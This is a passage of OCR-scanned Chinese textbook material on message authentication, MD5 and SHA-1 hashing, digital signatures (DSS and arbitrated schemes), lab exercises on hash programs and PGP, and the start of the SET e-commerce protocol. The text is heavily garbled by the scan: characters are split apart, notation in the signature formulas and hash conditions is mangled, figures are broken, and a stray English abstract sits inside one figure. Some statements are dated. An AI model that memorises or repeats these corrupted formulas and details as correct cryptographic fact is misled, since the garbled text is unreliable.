2. 采用 询问 -应 答 机 制 


接收 方向 发 送 方 发 送 一 个 一 次 性 随机 数 作为 请 求 ,发送 方 发 送 报 文 时 将 接收 到 的 随机 
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数 附加 到 报 文中 一 起 发 送 给 接收 方 。 接 收 方 可 以 借 此 鉴别 所 收 到 的 报 文 是 否 新 的 。 

所 以 ,序列 保护 和 实时 性 保护 都 比较 简单 。 但 是 要 鉴别 一 个 报 文 的 内 容 完整 性 有 没有 
被 破坏 ,就 不 那么 简单 了 。 

可 以 说 ,传统 的 元 余 校 验 码 是 一 种 简单 的 报 文 鉴别 方法 。 但 它 主要 用 于 防止 人 工 操作 
或 传输 中 的 偶然 错误 。 若 用 于 对 付 攻击 者 ,就 勉 为 其 难 了 。 因 为 这 些 算法 比较 简单 而 且 是 
公开 的 ,技术 熟练 者 是 完全 可 以 成 功 地 旁 路 这 些 检测 。 不 过 ,人 们 可 以 从 中 得 到 启示 ; 进行 
完整 性 保护 的 基本 思路 是 从 原来 的 报 文生 成 一 个 具有 唯一 性 的 鉴别 码 , 并 且 生 成 的 方法 是 
秘密 的 。 这 样 将 报 文 及 其 鉴别 码 一 同 传送 到 目的 方 后 ,用 同样 的 方法 从 接收 的 报 文 再 生成 
一 次 鉴别 码 , 由 于 鉴别 码 具 有 唯一 性 ,比较 两 个 鉴别 码 , 即 能 证 实 报 文 在 传送 过 程 中 有 没有 
被 删除 .插入 或 修改 过 。 


2.1.2 报 文 鉴别 与 报 文 摘要 数据 完整 性 保护 概述 


1. 报 文 鉴别 方法 


报 文 鉴别 (message authentication) 也 称 消息 鉴别 ,是 用 于 鉴别 报 文 ( 即 消息 ) 内 容 完 
性 的 过 程 , 即 鉴别 报 文 在 传输 中 有 没有 被 删除 .添加 或 修改 。 

按照 这 一 思路 , 若 将 报 文 的 密 文 与 明文 一 同 传送 ,接收 方 再 从 明文 生成 一 次 密 文 , 再 对 
两 个 密 文 进行 比较 ,就 可 以 进行 报 文 的 完整 性 鉴别 。 但 是 ,这 种 鉴别 码 太 长 。 目 前 广 为 采 用 
的 生成 报 文 鉴 别 码 的 方法 主要 有 两 种 : 一 种 方法 称 为 报 文 鉴别 码 方法 , 它 是 使 用 一 个 由 密 
钥 控 制 的 公开 函数 由 报 文 产 生 的 固定 长 的 数值 ,也 称 密码 校 验 和 。 另 一 种 方法 称 为 杂凑 码 
( 散 列 码 ), 它 是 将 报 文 使 用 单 向 杂凑 (hash, 喻 希 ) 函 数 变换 成 为 具有 固定 长 度 的 报 文 (消息 ) 
摘要 (message digest, MD)。 如 图 2. 1 表明 了 将 报 文 M 利用 杂凑 函数 妃 得 到 的 杂凑 码 
五 CM) 的 过 程 。 


M 
ff 
Hash functions were introduced in cryptology in the late seventies as a tool HM) 


to proteet the authenticity of information. Soon it became clear that they 一 一 一 一 
were a very useful building block to solve other security problems in PETTY PT 
telecommunication and computer networks. This paper sketches the history 


of the concept, discusses the applications of hash functions, and preents the 
approaches that have been followed to construct hash functions. 


图 2.1 杂凑 函数 的 功能 
报 文摘 要 能 像 指纹 识别 一 样 可 以 识别 报 文 ,所 以 也 称 为 数字 指纹 。 
2. 报 文摘 要 的 使 用 方法 


图 2.2 给 出 了 报 文摘 要 的 4 种 使 用 方法 。 其 中 , (a)、(d) 用 于 要 求 机 密 性 保护 的 场合 ， 
(b)、(c) 用 于 不 要 求 机 密 性 保护 的 场合 。 
此 外 ,还 可 以 有 其 他 形式 ,这 里 不 再 介绍 。 


。50 。 


(d) 传送 Ek[MIEsk [HM 


图 2.2 报 文摘 要 的 几 种 用 法 


2.1.3 报 文 摘要 算法 


1. 对 杂凑 函数 的 一 般 要 求 


报 文摘 要 就 像 是 需要 鉴别 的 数据 的 一 个 “指纹 ”。 为 了 实现 对 于 数据 的 鉴别 ,杂凑 函数 
应 当 满足 如 下 一 些 条 件 : 

(1) 对 于 不 同 的 报 文 不 能 产生 相同 的 杂凑 码 , 即 对 于 任何 两 个 报 文 X 和 Y, 不 能 生成 
五 (X) 王 五 (Y)。 因 此 ,改变 原始 报 文 中 的 任意 一 位 的 值 , 将 产生 完全 不 同 的 杂凑 码 。 

(2) 无 法 由 HD 推出 报 文 , 即 对 于 给 定 的 杂凑 码 MD, 几 乎 无 法 找到 M 使 
H(M')=MD., 

(3) 对 于 任意 一 个 报 文 ,无 法 预知 它 的 杂凑 码 。 

(4) 的 输入 可 以 是 任意 长 ,而 输出 是 固定 长 。 

(5) 瓦 函数 的 算法 是 公开 的 ,杂凑 码 的 安全 性 来 自 互 产 生 单 向 杂凑 的 能 力 。 

例 2.1 设 报 文 有 m 组 分 组 ,杂凑 码 C 有 n 比特 , 则 某 一 位 杂凑 码 C; 可 以 这 样 简单 地 


家 二 看 涡 


计算 
C=B; DB 四 … 四 B, 
当然 , 它 并 不 完全 满足 对 杂凑 函数 的 要 求 。 典 型 的 报 文摘 要 算法 有 MD5(Rivest 提出 ， 
1992 年 [RFC 1321] 公 布 , 码 长 128 比特 ) 和 安全 散 列 算法 SHA(Secure Hash Algorithm 提 
出 , 码 长 160 比特 ) 。 由 于 SHA 比 MD5 多 了 32 比特 ,所 以 更 安全 ,但 要 慢 些 。 


2. 报 文 摘要 算法 MDS 


MD5(1991 年 ) 是 沿 着 MD2(1989 年 )\MD4(1990 年 ) 的 轨迹 进化 形成 的 报 文摘 要 算法 
的 最 新 版 本 。 它 的 开发 者 是 作为 RSA 算法 设计 者 之 一 的 Ronald L. Rivest。MD5 不 以 任 
何 假设 和 密码 体制 为 基础 ,是 一 个 直接 构造 出 来 的 算法 。 它 的 主要 特点 是 : 

。 单 向 性 : 由 报 文生 成 报 文摘 要 ,但 不 能 由 报 文摘 要 还 原 为 报 文 。 

。 无 碰撞 性 : 对 于 不 同 的 报 文 不 会 产生 两 个 相同 的 报 文摘 要 。 

。 运算 速度 快 ,应 用 比较 普遍 。 

(1) MD5 的 主要 应 用 

MD5 主要 应 用 在 如 下 两 个 方面 : 防 自 改 鉴别 和 加 密 。MD5 的 典型 应 用 是 对 一 段 报 文 
产生 一 个 128 比特 的 报 文摘 要 。 例 如 ,在 UNIX 下 有 很 多 软件 在 下 载 时 都 有 一 个 扩展 名 
为 . md5 的 文件 ,在 这 个 文件 中 通常 只 有 一 行文 本 ,大 致 结构 如 


MD5 (tanajiya. tar. gz) = 0cal75b9c0f726a831d895e269332461 


这 就 是 tanajiya. tar. gz 文件 的 数字 签名 。 如 果 在 以 后 传播 这 个 文件 的 过 程 中 ,无 论文 
件 的 内 容 发 生 了 任何 形式 的 改变 (包括 人 为 修改 或 者 下 载 过 程 中 线路 不 稳定 引起 的 传输 错 
误 等 ), 只 要 对 这 个 文件 重新 计算 MD5 就 会 发 现 报 文摘 要 不 相同 。 由 此 可 以 确定 得 到 的 只 
是 一 个 不 正确 的 文件 。 如 果 再 有 一 个 第 三 方 的 鉴别 机 构 , 用 MD5 还 可 以 防止 文件 作者 的 
“抵赖 ”, 这 就 是 所 谓 的 数字 签名 应 用 。 

在 加 密 系统 中 ,密码 的 保管 至 关 重 要 。 由 于 具有 系统 管理 员 权 限 的 用 户 可 以 读 密码 文 
件 ,所 以 用 常规 保存 的 密码 文件 的 对 系统 管理 员 权 限 的 用 户 就 无 秘密 可 言 。 而 MD5 的 单 
向 性 和 无 碰撞 性 ,使 得 用 户 密码 可 以 用 MD5( 或 其 他 类 似 的 算法 ) 加 密 后 存储 。 当 用 户 登 录 
的 时 候 ,系统 把 用 户 输入 的 密码 计算 成 MD5 值 , 然 后 再 去 和 保存 在 文件 系统 中 的 MD5 值 
进行 比较 ,进而 确定 输入 的 密码 是 否 正确 。 这 样 ,系统 就 可 以 在 不 知道 用 户 密码 的 明码 的 情 
况 下 确定 用 户 登录 系统 的 合法 性 ,不 但 可 以 避免 用 户 的 密码 被 知道 ,而 且 还 在 一 定 程度 上 增 
加 了 密码 被 破解 的 难度 。 

(2) MD5 算法 描述 

MD5 算法 的 基本 轮廓 如 下 : 

。 以 512 比特 分 组 来 处 理 输 入 的 报 文 ; 

。 每 一 分 组 又 被 划分 为 16 个 32 比特 子 分 组 ; 

。 经 过 了 一 系列 的 处 理 后 ,输出 4 个 32 比特 分 组 放 在 4 个 链接 变量 (Chaining Varia- 

ble) 或 称 寄存 器 A、B、C.D 中 ; 

。 将 4 个 链接 变量 进行 级 联 ,生成 一 个 128 比特 散 列 值 。 
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上 述 轮 廓 可 以 分 为 如 下 4 步 完成 : 

第 1 步 : 数据 扩展 。 将 报 文 按照 图 2. 3 的 格式 用 “100…0” 进 行 填充 ,并 附加 一 个 64 比 
特 的 原始 报 文 长 度 字段 ,使 得 总 长 度 为 512 比特 的 整数 倍 。 应 当 注意 ,填充 是 必需 的 , 若 报 
文 长 度 为 (512 比特 的 整数 倍 一 64 比特 ) , 则 还 需 填充 一 个 512 比特 长 度 的 填充 字段 。 


— 512 比 特 的 整数 倍 | 
六 报 文 长 度 "| -64 比 特 一 | 
报 文 | 100…0 报 文 长 度 


图 2.3 数据 准备 格式 
第 2 步 : 初始 化 MD 缓冲 区 。 使 它们 的 十 六 进 制 初始 值 分 别 为 : 


A=0x01234567,B=0x89abcdef,C=0xfedcba98,D=0x76543210 


第 3 步 : 报 文 切 块 。 按 照 512 比特 的 长 度 , 将 报 文 分 割 成 (N 十 1) 个 分 组 : Yo ,Yi ,…， 
Yn。 每 一 分 组 又 可 以 表示 为 16 个 32 比特 的 字 。 
第 4 步 : 依次 对 各 分 组 进行 Hyo; 压 缩 ,生成 MD。 如 图 2.4 所 示 , 从 分 组 Ye 开始 到 最 
一 个 分 组 Yw ,依次 进行 Huo 压缩 运算 。 每 个 有 Hywos 有 两 个 输入 (一 个 128 比特 的 CV。 和 
一 个 512 比特 的 分 组 Y,) 和 一 个 128 比特 输出 ;最 开始 的 128 比特 输入 为 4 个 32 比特 的 链 
接 变量 ;以 后 每 个 电 vwws 的 输出 作为 下 一 个 的 128 比特 输入 。 最 后 的 一 个 128 比特 的 输出 ， 
即 为 所 求 的 MD。 显 然 , 这 个 过 程 可 以 用 循环 或 递归 实现 。 


512b 512b 512b 512b 


512b 512b 512b 512b 
可 128b 
Va 
ABCD b 
A pp 128b 128b “ er 8b 128b 


图 2.4 依次 对 各 分 组 进行 Ho 压缩 生成 MD 


有 wps 算法 是 MD5 的 关键 函数 。 它 的 计算 由 4 轮 处 理 组 成 ,每 一 轮 又 包括 了 16 个 操 
作 , 总 共 64 次 操作 ,每 一 次 操作 要 使 用 一 个 常数 。 关 于 它 的 细节 这 里 不 再 介绍 。 需 要 说 明 
的 是 ,MD5 曾经 被 人 们 认为 是 无 碰撞 的 。 但 是 ,在 2004 年 8 月 17 日 在 美国 加 州 圣 巴巴 拉 
召开 的 国际 密码 学 会 议 (Crypto”2004) 上 ,我 国 山东 大 学 教授 王小云 宣布 她 已 经 找到 了 
MD5 碰撞 的 方法 。 但 是 ,目前 人 们 还 没有 找到 MD5 的 合适 的 代替 方案 。 


3. 安全 杂凑 算法 SHA 


SHA(secure hash algorithm ,安全 杂凑 算法 ) 是 由 美国 国家 标准 技术 研究 所 (NIST) 于 
1993 年 发 布 的 联邦 信息 处 理 标准 (FIPS 180) 中 的 安全 散 列 标准 (secure hash standard， 
SHS) 中 使 用 的 算法 。1995 年 修订 为 SHA-1。 

SHA 与 MD5 都 是 来 自 MD4, 所 以 它们 有 许多 相似 之 处 。 这 里 对 SHA 的 细节 不 再 介 
绍 , 仅 在 表 2. 1 中 对 这 两 种 报 文摘 要 算法 进行 比较 。 

和 


表 2.1 MD5 与 SHA-1 的 比较 


项 目 摘要 长 度 /b | 最 大 报 文 长 度 分 组 处 理 长 度 /b 运算 次 数 常数 个 数 
MD5 128 无 限制 512 64(4 轮 16 次 ) 64 
SHA-1 160 25% 一 1 512 80(4 轮 20 次 ) 4 


总 之 ,SHA-1 比 MD5 抗击 穷 举 搜索 的 强度 高 ,但 执行 速度 较 慢 。 
实验 3 实现 报 文 认证 算法 


1. 实验 目的 


(1) 加 深 对 报 文 认证 算法 的 理解 (如 哈 希 函数 的 概念 及 密 钥 指纹 的 生成 方法 ) 。 
(2) 掌握 对 报 文 认证 算法 的 应 用 方法 。 


2. 实验 内 容 


(1) 运行 一 种 报 文 认证 算法 (MD5、SHA 等 ) 程 序 。 

(2) 测试 运行 的 报 文 认 证 算法 程序 。 

(3) 分 别 按照 下 面 的 一 种 模式 使 用 上 述 报 文 认证 算法 进行 比较 : 

。 报 文 与 认证 符 链接 后 ,用 单 钥 加 密 传送 ， 

。 仅 对 认证 符 用 单 钥 加 密 , 然 后 再 与 被 认证 报 文 链接 传送 ; 

。 用 公 钥 加 密 算法 使 用 发 方 私 钥 仅 对 认证 符 加 密 ,然后 再 与 被 认证 报 文 链接 传送 ; 

。 用 公 钥 加 密 算 法 使 用 发 方 私 钥 仅 对 认证 符 加 密 , 与 被 认证 报 文 链接 ,再 用 单 钥 加 密 
后 传送 ; 

。 将 报 文 与 通信 双方 共享 的 秘密 值 S 链接 后 计算 认证 符 ,附加 到 被 认证 报 文 发 送 。 


3. 实验 准备 


(1) 因 不 同 要 求 , 选 择 下 面 的 一 项 工作 : 

。 下载 一 种 报 文 认证 算法 的 程序 源 代码 进行 解析 ; 
。 自 己 设计 实现 一 种 报 文 认 证 程序 。 

(2) 编译 .调试 上 述 程序 。 

(3) 设计 完成 实验 内 容 的 环境 和 步骤 。 


4. 推荐 的 分 析 讨 论 内 容 


(1) 你 知道 哪些 报 文 认证 算法 ? 试 进行 比较 。 

(2) 分 别 分 析 报 文 认证 算法 的 几 种 不 同 使 用 模式 对 于 保证 数据 在 机 密 性 、 完 整 性 以 及 
在 防范 伪造 .抵赖 \ 冒 充 、 算 改 的 风险 方面 的 作用 。 

(3) 这 种 认证 算法 安全 吗 ?” 有 没有 看 到 关于 它 的 可 攻击 的 报道 ? 试 到 网 上 搜索 一 下 。 

(4) 其 他 发 现 或 想到 的 问题 。 


。54 。 


2.2 数字 签名 


报 文 鉴别 是 确定 一 个 报 文 可 靠 性 的 过 程 ,可 以 验证 报 文 有 没有 被 算 改 ,但 不 能 用 于 鉴别 
通信 中 的 一 方 对 另 一 方 有 没有 抵赖 或 否认 行为 。 当 通信 双方 尚未 建立 起 信任 关系 且 存在 利 
害 冲 突 的 情况 下 ,单纯 的 报 文 鉴 别 有 些 脆弱 ,不 得 不 采用 数字 签名 (digital signature) 。 

数字 签名 是 实现 数据 的 不 可 否认 性 保护 的 机 制 。 为 了 达到 这 一 目的 , 它 应 当 具 有 手工 
签名 一 样 的 性 质 : 

。 能 够 验证 签名 者 的 身份 ,以 及 签名 的 日 期 和 时 间 ; 

。 能 够 用 于 证 实 被 签 报 文 的 内 容 的 真实 性 ; 

。 签名 可 以 由 第 三 方 验证 ,以 解决 双方 在 通信 中 的 争议 。 

从 有 效 性 和 可 行 性 出 发 ,对 数字 签名 技术 有 以 下 要 求 : 

。 签名 的 产生 必须 使 用 发 送 方 独 有 的 一 些 信息 进行 ,以 防伪 造 和 否认 ; 

。 签名 的 产生 .识别 和 验证 应 比较 容易 

。 数字 签名 应 当 可 以 备份 ; 

。 用 已 知 的 签名 构造 一 个 新 的 报 文 或 由 已 知 的 报 文 产生 一 个 假冒 的 签名 ,在 计算 上 都 

是 不 可 行 的 。 


2.2.1 直接 数字 签名 和 数字 签名 标准 DSS 


1. 直接 数字 签名 概述 


所 谓 直接 方式 ,就 是 签名 过 程 只 有 发 送 方 和 接收 方 参与 。 实 施 这 种 方法 的 前 提 是 接收 
方 可 以 通过 某 种 方式 验证 发 送 方 提交 的 凭证 ,也 可 以 在 发 生 争议 时 将 该 凭证 交 第 三 方 仲裁 。 
在 数据 通信 中 ,双方 建立 秘密 通信 信道 的 密 钥 系 统 就 可 以 作为 该 凭证 。 通 信 双 方 建立 了 秘 
密 信道 ,无 非 有 两 种 情况 : 通信 双方 使 用 对 称 密 钥 体制 进行 加 密 通 信和 通信 双方 采用 公开 
密 钥 体制 进行 加 密 通 信 。 这 时 , 当 发 送 方向 接收 方 发 送 了 附 有 加 密 的 鉴别 码 的 报 文 ,接收 方 
通过 解密 验证 了 接收 到 的 鉴别 码 ,就 相当 于 确认 了 报 文 的 真实 性 ,如 果 发 生 争议 ,就 可 以 将 
报 文 和 密 钥 一 起 交 第 三 方 仲裁 。 图 2. 2 的 几 种 方法 都 可 以 认为 具有 数字 证 书 的 作用 。 

这 种 直接 签名 方法 是 将 一 种 算法 (如 RSA) 既 用 于 加 密 又 用 于 签名 ,使 签名 的 有 效 性 完 
全 依赖 于 密 钥 体制 的 安全 性 ,从 而 存在 一 些 不 可 靠 性 。 例 如 发 送 方 可 以 声称 自己 的 密 钥 被 
窃 或 被 盗用 ,和 否认 已 经 发 送 报 文 。 为 避免 这 样 的 威胁 ,可 以 要 求 每 一 个 被 签名 的 报 文 都 要 包 
会 一 个 时 间 戳 ,标明 报 文 发 送 的 日 期 和 时 间 , 同 时 要 求 一 旦 密 钥 丢失 或 被 盗用 ,要 立即 向 管 
理 机 构 报告 并 更 换 密 钥 。 但 是 , 若 密 钥 真正 被 盗 , 盗 窍 者 可 以 伪造 一 个 报 文 , 并 加 上 一 个 被 
盗窃 密 钥 之 前 的 时 间 戳 。 


2. 数字 签名 标准 DSS 


DSS(digital signature standard) 是 美国 国家 标准 委员 会 (NIST) 公 布 的 联邦 信息 处 理 
标准 FIPS PUB 186。 最 早 公 布 于 1991 年 ,在 征求 了 公众 意见 后 在 1993 年 和 1996 年 又 发 
i 


布 了 两 次 修改 版 。 图 2. 5 描述 了 DSS 签名 的 基本 过 程 。 


人 | ra | 


1 | | 
| “六 一 | Ea | 
| PKG SK, 1 传送 PK PK | 
M GSKa | M M | PKG 
区 FT 一 -一 一 一- 一 上 
| 1 六 
| I 1 
| 1 | 


图 2.5 DSS 签名 的 基本 过 程 


DSA 是 DSS 中 采用 的 数字 签名 算法 。DSA 算法 的 签字 函数 以 下 述 参 数 作 为 输入 : 

。 用 SHA 方法 生成 的 报 文摘 要 ; 

。 一 个 随机 数 ; 

。 发 送 方 的 私有 密 钥 SKa; 

。 全 局 公 钥 PK 一 一 供 所 有 用 户 使 用 的 一 族 参数 。 

DSA 算法 输出 两 个 数据 : s 和 xr。 这 两 个 输出 就 构成 了 对 报 文 M 的 数字 签名 。 

接收 方 收 到 报 文 后 , 先 产 生 报 文 的 摘要 ,再 将 这 个 摘要 和 收 到 的 签字 以 及 全 局 公 钥 
PKe .发送 方 的 公开 密 钥 PKA 一 起 送 到 DSA 的 验证 函数 中 ,生成 一 个 新 的 。 若 与 + 相 
等 ,就 说 明 签 字 有 效 。 

DSA 算法 的 安全 性 不 再 依赖 于 加 密 密 钥 的 安全 性 。 同 时 ,其 计算 基于 求 离散 对 数 的 困 
难 性 ,使 攻击 者 从 7 恢复 n, 或 从 ;恢复 SKA 都 是 在 计算 上 不 可 行 的 。 所 以 ,DSS 比 采用 
RSA 的 签名 方法 要 可 靠 得 多 。 

除 基 于 离散 对 数 的 签字 算法 外 ,人 们 还 开发 了 其 他 一 些 签字 算法 。 关 于 它们 的 细节 ,这 
里 不 再 介绍 。 


2.2.2 有 仲裁 的 数字 签名 


有 仲裁 的 数字 签名 的 基本 思想 是 : 发 送 方 完成 签名 后 ,不 是 直接 发 送 给 接收 方 ,而 是 将 
报 文 和 签名 先 发 送 给 双方 共同 信任 的 第 三 方 进行 验证 ,第 三 方 验证 无 误 后 ,再 附加 一 个 “已 
经 通过 验证 ?的 说 明 并 注 上 日 期 ,一 同 发 送 给 接收 方 。 由 于 第 三 方 的 介入 ,发送 方 和 接收 方 

有 仲裁 的 数字 签名 方法 也 有 很 多 ,下 面 仅 举 几 例 。 假 定 报 文 由 X 向 Y 传送 ,A 为 仲裁 
者 ,M 为 传输 报 文 ,HCMD) 为 杂凑 函数 值 , | 为 链接 ,IDx 为 X 的 身份 , 工 是 时 间 戳 , 则 可 以 有 
如 下 几 种 方案 。 


1. 方案 1 


OD X=>A: M| Ex [IDx | HOM)]。X 将 签名 Ex [IDx | HCM)J 和 报 文 M 发 给 A。 
Kx 为 X 和 人 A 的 共享 密 钥 。 
@ A>Y: Ex [IDx | MI Ex [IDx | HCMD] TJ]。A 对 签名 验证 后 ,再 附加 上 时 间 
稚 工 并 用 A 和 YY 共享 的 密 钥 Kay 加 密 后 转发 给 Y。 
es 56% 


@ YY 收 到 A 发 来 的 报 文 ,解密 后 ,将 结果 保存 起 来 。 由 于 Y 不 知道 Kxa ,所 以 不 能 直 
接 检 查 X 的 签名 ,只 能 相信 A。 

当 出 现 争议 时 ,Y 可 以 声称 自己 收 到 的 M 来 自 X, 并 将 

Exsy LIDx | M | Ex, LIDx | HCM)J NT] 

发 送 给 A, 让 A 仲裁 。 

这 个 方案 是 建立 在 X 和 YY 都 对 A 高 度 信任 的 基础 上 : 

。 XX 相信 A 不 会 泄露 Kxa ,也 不 会 伪造 自己 的 签名 ; 

。 Y 相信 A 所 验证 X 的 签名 是 可 靠 的 ; 

。X 和 YY 都 相信 出 现 争 议 时 ,A 能 公正 地 处 理 。 

所 以 会 得 到 如 下 结论 : 

。X 相信 Y 无 法 对 收 到 的 报 文 予 以 否认 ; 

。 Y 相信 XX 不 会 对 他 所 发 送 的 报 文 予以 否认 。 

但 是 ,这 个 方案 未 提供 保密 性 ,X 传送 给 A 的 M 是 明文 形式 。 此 外 ,方案 本 身 没有 对 
仲裁 者 的 限制 机 制 ,一 旦 仲裁 者 不 公正 ,如 与 发 送 方 共 谋 和 否认 发 送 过 报 文 , 或 与 接收 方 连 手 
伪造 发 送 方 的 签名 ,都 会 形成 签名 的 漏洞 。 


2. 方案 2 


© X=>A: IDx | Ex [MJ | Ex LIDx | HCE, [MJ)J。 

© A>Y: Ex,y [LIDx | Er,y LM]J | Er, LIDx 1 HCErWy [MI)J | Tj 

这 个 方案 用 X 和 YY 的 共享 密 钥 Kxy 加 密 所 传送 的 M, 从 而 提供 了 保密 性 。 但 还 没有 解 
决 对 仲裁 者 的 约束 。 


3. 方案 3 


@ X=>A: IDx | Esk.[LIDx | Eexv[EskLM]]]。 

© A>Y:; 下 sk [LIDx | Epk, LEsxk, [MJJ | TJ], 

在 这 个 方案 中 ,仲裁 者 只 能 用 X 的 公 钥 对 Esx、 [IDx ‖ Epx, [LEsk、 [LMJ] 解密 ,得 到 ID* 与 以 
明文 形式 传送 来 的 IDx 进 行 比较 ,确认 这 个 报 文 确实 来 自 X, 却 不 能 解密 Erkv [Esx, LM]]。 
Erk,LEsr、 LM]j] 要 由 YY 才能 解密 。 因 为 Y 可 以 使 用 PKs 解密 Esx, [IDx | Epry LEsx, LMj] 

| 了 9], 进一步 用 SKy 解 密 Em [Es [MJ] | 工 , 再 用 PKx 解 密 Es [MJ]。 这 样 就 使 仲裁 广 
无 法 与 任何 一 方 共 谋 。 


实验 4 加 密 软 件 PGP 的 使 用 


1. 实验 说 明 


PGP(pretty good privacy) 是 一 个 基于 RSA 公 匙 加 密 体系 的 邮件 加 密 软 件 , 也 是 一 个 
与 Linux 齐名 的 优秀 自由 软件 。 其 最 早 的 版 本 由 美国 的 Philip R. Zimmermann 开发 ,并 于 
1991 年 在 Internet 上 免费 发 布 。 为 了 打破 美国 政府 对 于 软件 出 口 的 限制 ,PGP 的 国际 版 在 
美国 境外 开发 ,并 带 一 个 i 以 区 别 。 任 何人 都 可 以 从 挪威 的 网 站 www. pgpi. com 上 下 载 到 


最 新 的 版 本 ,大 小 约 为 7. 8MB。 

PGP 采用 了 审慎 的 密 钥 管理 ,是 一 种 RSA 和 传统 加 密 的 杂 合算 法 ,用 于 数字 签名 的 邮 
件 文摘 算法 、 加 密 前 压缩 等 ,还 有 一 个 良好 的 人 机 工程 设计 。 它 可 以 让 任何 人 安全 地 和 从 未 
见 过 的 人 通信 ,并 且 事 先 不 需要 任何 保密 的 渠道 用 来 传递 密 钥 。 同 时 它 的 功能 强大 ,有 很 快 
的 速度 , 源 代码 还 是 免费 的 。 

PGP 对 每 次 会 话 的 报 文 进行 加 密 后 传输 , 它 采 用 的 加 密 算法 包括 : AES-256、AES- 
192、AES-128 .CAST、3DES、IDEA、Twofish 等 。 例 如 使 用 AES 密 钥 最 长 可 达 256b, 这 已 
经 足够 安全 了 。 

当 发 送 者 PGP 加 密 一 段 明 文 时 ,PGP 首先 压缩 明文 ,然后 PGP 建立 一 个 一 次 性 会 话 
密 钥 ,采用 传统 的 对 称 加 密 算法 (例如 AES 等 ) 加 密 刚 才 压 缩 后 的 明文 ,产生 密 文 。 然 后 用 
接收 者 的 公开 密 钥 加 密 刚才 的 一 次 性 会 话 密 钥 , 随 同 密 文 一 同 传输 给 接收 方 。 接 收 方 首先 
用 私有 密 钥 解密 ,获得 一 次 性 会 话 密 钥 ,最 后 用 这 个 密 钥 解密 密 文 。 

目前 ,PGP 使 用 的 散 列 函数 包括 : SHA-2(256b)、SHA-2(384b) 、SHA-2(512b) 、SHA- 
1(160b)、RIPEMD(128b) .MD-5(128b) 等 。 

PGP 在 签名 之 后 加 密 之 前 对 报 文 进行 压缩 。 它 使 用 了 有 Jean-lup Gailly、Mark Adler、 
Richard Wales 等 编写 的 ZIP 压缩 算法 。 

在 PGP 里面 ,最 有 特色 的 或 许 就 是 它 的 密 钥 管 理 。PGP 包含 4 种 密 钥 : 一 次 性 会 话 密 
钥 、 公 开 密 钥 、 私 有 密 钥 和 基于 口令 短语 的 常规 密 钥 。 

用 户 使 用 PGP 时 ,应 该 首先 生成 一 个 公开 密 钥 / 私 有 密 钥 对 。 其 中 公开 密 钥 可 以 公开 ,而 
私有 密 钥 绝对 不 能 公开 。PGP 将 公开 密 钥 和 私有 密 钥 用 两 个 文件 存储 ,一 个 用 来 存储 该 用 户 
的 公开 /私有 密 钥 , 称 为 私有 密 钥 环 ; 另 一 个 用 来 存储 其 他 用 户 的 公开 密 钥 , 称 为 公开 密 钥 环 。 

为 了 确保 只 有 该 用 户 可 以 访问 私有 密 钥 环 ,PGP 采用 了 比较 简洁 和 有 效 的 算法 。 当 用 
户 使 用 RSA 生成 一 个 新 的 公开 /私有 密 钥 对 时 ,输入 一 个 口令 短语 ,然后 使 用 散 列 算法 ( 例 
如 SHA-1) 生 成 该 口令 的 散 列 编码 ,将 其 作为 密 钥 ,采用 CAST-128 等 常规 加 密 算 法 对 私有 
密 钥 加 密 ,存储 在 私有 密 钥 环 中 。 当 用 户 访问 私有 密 钥 时 ,必须 提供 相应 的 口令 短语 ,然后 
PGP 根据 口令 短语 获得 散 列 编码 ,将 其 作为 密 钥 ,对 加 密 的 私有 密 钥 解 密 。 通 过 这 种 方式 
就 保证 了 系统 的 安全 性 依赖 于 口令 的 安全 性 。 


2. 实验 目的 


(1) 掌握 PGP 的 下 载 、. 安 装 和 使 用 方法 。 
(2) 进一步 加 深 对 于 数据 加 密 .数据 认证 理论 的 理解 。 


3. 实验 内 容 


(1) 下 载 并 安装 PGP。 
(2) 使 用 PGP 生成 并 管理 密 钥 。 
(3) 使 用 PGP 对 文件 进行 加 密 /解密 。 
(4) 使 用 PGP 对 文件 进行 签名 和 认证 。 
(5) 使 用 PGP 销毁 加 密 文件 。 
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4. 实验 准备 


(1) 准备 一 个 实验 用 的 数据 文件 。 

(2) 事先 浏览 可 以 下 载 PGP 软件 的 网 站 ,了 解 可 以 下 载 的 最 新 PGP 版 本 及 其 特点 。 
(3) 书写 出 实验 的 详细 步 又。 

(4) 确定 下 载 软 件 需要 的 运行 环境 。 


5. 推荐 的 分 析 讨论 内 容 


(1) 你 认为 PGP 安全 的 最 大 威胁 在 什么 地 方 ? 
(2) 加 密 文件 的 销毁 要 注意 什么 ? 
(3) 其 他 发 现 或 想到 的 问题 。 


2.2.3 应 用 实例 一 一 安全 电子 交换 协议 SET 


SET(secure electronic transaction, 安 全 电子 交换 ) 协 议 是 一 种 利用 加 密 技 术 (cryptog- 
raphy) ,以 确保 信用 卡 消费 者 、 销 售 商 及 金融 机 构 在 Internet 上 从 事 电 子 交易 的 安全 性 和 隐 
私 性 的 协议 。 它 是 由 两 大 信用 卡 公 司 VISA 和 Master 在 GTE、 IBM、Microsoft、 
Netscape、SAIC、Terisa System、Verisign 等 著名 IT 公司 的 支持 下 开发 的 ,于 1996 年 2 月 1 
日 正式 公布 。 


1. 电子 商务 中 的 BtoC 交易 过 程 


交易 指 买卖 双方 之 间 进 行商 品 交 易 的 行为 。 广 义 的 交易 是 一 个 复杂 的 过 程 。 在 电子 商 
务 中 ,由 于 参与 方 不 同等 原因 ,会 形成 不 同 的 交易 过 程 , 如 BtoB(business to business, 企 业 
间 电子 商务 ) 的 交易 过 程 .BtoC(business to consumer, 企 业 对 消费 者 的 电子 商务 ) 的 交易 过 
程 等 。 下 面 主 要 介绍 BtoC 的 交易 过 程 。 
在 BtoC 的 交易 过 程 中 ,主要 角色 有 : 
。 商家 (merchant) : 商品 或 服务 的 提供 者 。 
。 银行 (acquirer) : 为 在 线 交 易 者 开设 账号 ,并 处 理 支付 卡 的 认证 和 支付 业务 。 
。 支付 网 关 (payment gateway): 将 Internet 上 的 传输 数据 转换 为 金融 机 构 的 内 部 
数据 。 
。 持 卡 者 (cardholder) : 即 消费 者 ,可 以 使 用 付款 卡 结算 。 
。 发 卡 机 构 (issuer) : 为 每 一 个 建立 了 账户 的 客户 颁发 付款 卡 ,也 可 以 由 指派 的 第 三 
方 处 理 商 家 支付 信息 和 客户 支付 命令 。 
图 2.6 为 BtoC 的 基本 交易 过 程 。 它 可 以 分 为 下 面 4 种 业务 7 个 步骤 : 
(1) 订货 
Q@ 消费 者 上 网 ,查看 企业 和 商家 网 页 ,选择 商品 ;消费 者 通过 对 话 框 填写 订货 单 (姓名 、 
地 址 、 品 种、 规格 数量、 价格 ) 给 商家 。 
(2) 支付 
